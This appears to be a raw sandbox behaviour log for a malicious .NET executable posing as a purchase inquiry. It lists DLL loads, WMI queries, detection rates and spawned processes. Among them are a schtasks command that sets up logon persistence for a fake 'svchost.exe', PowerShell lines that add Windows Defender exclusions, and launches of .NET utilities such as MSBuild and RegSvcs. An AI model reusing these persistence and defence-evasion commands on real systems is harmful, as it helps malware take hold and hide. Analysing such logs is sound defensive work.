                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeReversingLabs: Detection: 36%
                    Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeVirustotal: Detection: 25%
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeFile read: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe "C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe"
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp89F4.tmp.bat""
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 456 -p 7792 -ip 7792
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7792 -s 1152
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 508 -p 7872 -ip 7872
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7872 -s 1104
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 536 -p 7748 -ip 7748
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7748 -s 1144
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 568 -p 8396 -ip 8396
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8396 -s 1352
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe "C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe"
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe "C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe"
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exitJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp89F4.tmp.bat""Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -ForceJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -ForceJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 456 -p 7792 -ip 7792
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7792 -s 1152
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 508 -p 7872 -ip 7872
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7872 -s 1104
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 536 -p 7748 -ip 7748
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7748 -s 1144
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 568 -p 8396 -ip 8396
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8396 -s 1352
                    Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                    Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dllJump to behavior
